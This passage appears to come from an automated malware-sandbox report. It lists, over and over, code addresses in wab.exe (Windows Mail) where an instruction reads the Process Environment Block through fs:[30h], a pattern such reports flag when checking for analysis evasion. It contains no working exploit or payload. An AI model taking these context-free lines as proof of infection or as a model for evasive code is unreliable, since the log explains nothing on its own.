Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBDDB1 mov eax, dword ptr fs:[00000030h] 10_2_1FDBDDB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBDDB1 mov eax, dword ptr fs:[00000030h] 10_2_1FDBDDB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCDB1 mov ecx, dword ptr fs:[00000030h] 10_2_1FDDCDB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCDB1 mov eax, dword ptr fs:[00000030h] 10_2_1FDDCDB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCDB1 mov eax, dword ptr fs:[00000030h] 10_2_1FDDCDB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD9DAF mov eax, dword ptr fs:[00000030h] 10_2_1FDD9DAF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAFDA9 mov eax, dword ptr fs:[00000030h] 10_2_1FDAFDA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD6DA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD6DA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0D59 mov eax, dword ptr fs:[00000030h] 10_2_1FDA0D59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0D59 mov eax, dword ptr fs:[00000030h] 10_2_1FDA0D59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0D59 mov eax, dword ptr fs:[00000030h] 10_2_1FDA0D59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8D59 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8D59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8D59 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8D59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8D59 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8D59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8D59 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8D59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8D59 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8D59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE38D6B mov eax, dword ptr fs:[00000030h] 10_2_1FE38D6B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBD4E mov eax, dword ptr fs:[00000030h] 10_2_1FDDBD4E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBD4E mov eax, dword ptr fs:[00000030h] 10_2_1FDDBD4E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97D41 mov eax, dword ptr fs:[00000030h] 10_2_1FD97D41
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4FD78 mov eax, dword ptr fs:[00000030h] 10_2_1FE4FD78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4FD78 mov eax, dword ptr fs:[00000030h] 10_2_1FE4FD78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4FD78 mov eax, dword ptr fs:[00000030h] 10_2_1FE4FD78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4FD78 mov eax, dword ptr fs:[00000030h] 10_2_1FE4FD78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4FD78 mov eax, dword ptr fs:[00000030h] 10_2_1FE4FD78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2DD47 mov eax, dword ptr fs:[00000030h] 10_2_1FE2DD47
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA7D75 mov eax, dword ptr fs:[00000030h] 10_2_1FDA7D75
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA7D75 mov eax, dword ptr fs:[00000030h] 10_2_1FDA7D75
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE61D5A mov eax, dword ptr fs:[00000030h] 10_2_1FE61D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE61D5A mov eax, dword ptr fs:[00000030h] 10_2_1FE61D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE61D5A mov eax, dword ptr fs:[00000030h] 10_2_1FE61D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE61D5A mov eax, dword ptr fs:[00000030h] 10_2_1FE61D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD4D1D mov eax, dword ptr fs:[00000030h] 10_2_1FDD4D1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE28D20 mov eax, dword ptr fs:[00000030h] 10_2_1FE28D20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2FD2A mov eax, dword ptr fs:[00000030h] 10_2_1FE2FD2A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2FD2A mov eax, dword ptr fs:[00000030h] 10_2_1FE2FD2A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD96D10 mov eax, dword ptr fs:[00000030h] 10_2_1FD96D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD96D10 mov eax, dword ptr fs:[00000030h] 10_2_1FD96D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD96D10 mov eax, dword ptr fs:[00000030h] 10_2_1FD96D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3D00 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBAD00 mov eax, dword ptr fs:[00000030h] 10_2_1FDBAD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBAD00 mov eax, dword ptr fs:[00000030h] 10_2_1FDBAD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBAD00 mov eax, dword ptr fs:[00000030h] 10_2_1FDBAD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE58D10 mov eax, dword ptr fs:[00000030h] 10_2_1FE58D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE58D10 mov eax, dword ptr fs:[00000030h] 10_2_1FE58D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97CD5 mov eax, dword ptr fs:[00000030h] 10_2_1FD97CD5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97CD5 mov eax, dword ptr fs:[00000030h] 10_2_1FD97CD5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97CD5 mov eax, dword ptr fs:[00000030h] 10_2_1FD97CD5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97CD5 mov eax, dword ptr fs:[00000030h] 10_2_1FD97CD5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97CD5 mov eax, dword ptr fs:[00000030h] 10_2_1FD97CD5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9CCC8 mov eax, dword ptr fs:[00000030h] 10_2_1FD9CCC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1CC7 mov eax, dword ptr fs:[00000030h] 10_2_1FDB1CC7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1CC7 mov eax, dword ptr fs:[00000030h] 10_2_1FDB1CC7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD5CC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD5CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD5CC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD5CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE41CF9 mov eax, dword ptr fs:[00000030h] 10_2_1FE41CF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE41CF9 mov eax, dword ptr fs:[00000030h] 10_2_1FE41CF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE41CF9 mov eax, dword ptr fs:[00000030h] 10_2_1FE41CF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD2CF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD2CF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD2CF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD2CF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDD2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE23CDB mov eax, dword ptr fs:[00000030h] 10_2_1FE23CDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE23CDB mov eax, dword ptr fs:[00000030h] 10_2_1FE23CDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE23CDB mov eax, dword ptr fs:[00000030h] 10_2_1FE23CDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4FCDF mov eax, dword ptr fs:[00000030h] 10_2_1FE4FCDF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4FCDF mov eax, dword ptr fs:[00000030h] 10_2_1FE4FCDF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4FCDF mov eax, dword ptr fs:[00000030h] 10_2_1FE4FCDF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1CCA0 mov ecx, dword ptr fs:[00000030h] 10_2_1FE1CCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1CCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FE1CCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1CCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FE1CCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1CCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FE1CCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h] 10_2_1FE5FCAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h] 10_2_1FE50CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD98C8D mov eax, dword ptr fs:[00000030h] 10_2_1FD98C8D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3C84 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3C84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3C84 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3C84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3C84 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3C84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3C84 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3C84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC8CB1 mov eax, dword ptr fs:[00000030h] 10_2_1FDC8CB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC8CB1 mov eax, dword ptr fs:[00000030h] 10_2_1FDC8CB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9DCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FD9DCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFCA0 mov ecx, dword ptr fs:[00000030h] 10_2_1FDCFCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCFCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCFCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCFCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCFCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDDBCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDDBCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBCA0 mov ecx, dword ptr fs:[00000030h] 10_2_1FDDBCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBCA0 mov eax, dword ptr fs:[00000030h] 10_2_1FDDBCA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD4C59 mov eax, dword ptr fs:[00000030h] 10_2_1FDD4C59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h] 10_2_1FDAAC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h] 10_2_1FDAAC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h] 10_2_1FDAAC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h] 10_2_1FDAAC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h] 10_2_1FDAAC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h] 10_2_1FDAAC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6C50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6C50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6C50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6C50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6C50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6C50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97C40 mov eax, dword ptr fs:[00000030h] 10_2_1FD97C40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97C40 mov ecx, dword ptr fs:[00000030h] 10_2_1FD97C40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97C40 mov eax, dword ptr fs:[00000030h] 10_2_1FD97C40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97C40 mov eax, dword ptr fs:[00000030h] 10_2_1FD97C40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD1C7C mov eax, dword ptr fs:[00000030h] 10_2_1FDD1C7C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5FC4F mov eax, dword ptr fs:[00000030h] 10_2_1FE5FC4F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1C60 mov eax, dword ptr fs:[00000030h] 10_2_1FDB1C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6DC27 mov eax, dword ptr fs:[00000030h] 10_2_1FE6DC27
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6DC27 mov eax, dword ptr fs:[00000030h] 10_2_1FE6DC27
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6DC27 mov eax, dword ptr fs:[00000030h] 10_2_1FE6DC27
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE29C32 mov eax, dword ptr fs:[00000030h] 10_2_1FE29C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0C00 mov eax, dword ptr fs:[00000030h] 10_2_1FDB0C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0C00 mov eax, dword ptr fs:[00000030h] 10_2_1FDB0C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0C00 mov eax, dword ptr fs:[00000030h] 10_2_1FDB0C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0C00 mov eax, dword ptr fs:[00000030h] 10_2_1FDB0C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE71C3C mov eax, dword ptr fs:[00000030h] 10_2_1FE71C3C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCC00 mov eax, dword ptr fs:[00000030h] 10_2_1FDDCC00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE7BC01 mov eax, dword ptr fs:[00000030h] 10_2_1FE7BC01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE7BC01 mov eax, dword ptr fs:[00000030h] 10_2_1FE7BC01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBC3B mov esi, dword ptr fs:[00000030h] 10_2_1FDDBC3B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE24C0F mov eax, dword ptr fs:[00000030h] 10_2_1FE24C0F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9EC20 mov eax, dword ptr fs:[00000030h] 10_2_1FD9EC20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3BD6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3BD6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3BD6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3BD6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h] 10_2_1FDB3BD6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97BCD mov eax, dword ptr fs:[00000030h] 10_2_1FD97BCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD97BCD mov ecx, dword ptr fs:[00000030h] 10_2_1FD97BCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC0BCB mov eax, dword ptr fs:[00000030h] 10_2_1FDC0BCB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC0BCB mov eax, dword ptr fs:[00000030h] 10_2_1FDC0BCB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC0BCB mov eax, dword ptr fs:[00000030h] 10_2_1FDC0BCB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0BCD mov eax, dword ptr fs:[00000030h] 10_2_1FDA0BCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0BCD mov eax, dword ptr fs:[00000030h] 10_2_1FDA0BCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA0BCD mov eax, dword ptr fs:[00000030h] 10_2_1FDA0BCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA9BC4 mov eax, dword ptr fs:[00000030h] 10_2_1FDA9BC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCEBFC mov eax, dword ptr fs:[00000030h] 10_2_1FDCEBFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8BF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8BF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA8BF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA8BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE1BEF mov eax, dword ptr fs:[00000030h] 10_2_1FDE1BEF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE1BEF mov eax, dword ptr fs:[00000030h] 10_2_1FDE1BEF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE4EBD0 mov eax, dword ptr fs:[00000030h] 10_2_1FE4EBD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2FBDC mov eax, dword ptr fs:[00000030h] 10_2_1FE2FBDC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2FBDC mov eax, dword ptr fs:[00000030h] 10_2_1FE2FBDC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2FBDC mov eax, dword ptr fs:[00000030h] 10_2_1FE2FBDC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD9B9F mov eax, dword ptr fs:[00000030h] 10_2_1FDD9B9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD9B9F mov eax, dword ptr fs:[00000030h] 10_2_1FDD9B9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD9B9F mov eax, dword ptr fs:[00000030h] 10_2_1FDD9B9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB0BBE mov eax, dword ptr fs:[00000030h] 10_2_1FDB0BBE
